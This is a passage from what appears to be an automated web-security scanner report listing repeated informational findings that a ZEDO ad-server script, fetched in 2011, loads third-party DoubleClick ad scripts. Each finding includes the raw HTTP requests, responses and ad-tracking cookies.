Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFad=4:1:3:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|0,1,1:0,1,1:0,1,1:0,1,1:1,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:0,1,1:0,1,1:0,1,1:1,1,1;expires=Tue, 24 May 2011 16:46:21 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:4:1:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=240
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:21 GMT
Connection: close
Content-Length: 2073

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=4%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=4%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.93. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.9712796154129926 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=13:14:14:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:03 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=15:13:14:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:03 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
O0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5108358.3;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=15%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=15%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.94. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.8724388342010683 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=25:24:25:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:2,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:42 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=26:25:24:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=99
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:42 GMT
Connection: close
Content-Length: 2124

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.11;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921884%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=26%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=26%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.95. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.059319593837745765 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21; FFgeo=2241452; FFad=38:40:37:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=39:40:37:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=41
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:40 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=39%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=39%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.96. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.6845351607632746 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=11:13:11:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=12:13:11:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=145
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:57 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.33;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929078%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=12%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=12%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.97. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.858274151681732 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=17:17:18:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:18 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=19:17:17:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=123
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:18 GMT
Connection: close
Content-Length: 2152

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5236856.2;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=904952%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=19%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=19%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.98. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5405973916567646 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=25:24:22:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:3,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:4,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:40 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=23:25:24:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=101
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:40 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=23%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=23%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.99. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9742649453750609 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=29:30:30:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=30:30:30:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=84
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:48:58 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=30%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=30%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.100. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7971346554758543 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=17:18:16:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:17 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=18:18:16:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=124
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:17 GMT
Connection: close
Content-Length: 2123

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=18%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=18%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.101. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.8162023249169547 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=20:21:19:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:25 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=22:20:19:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
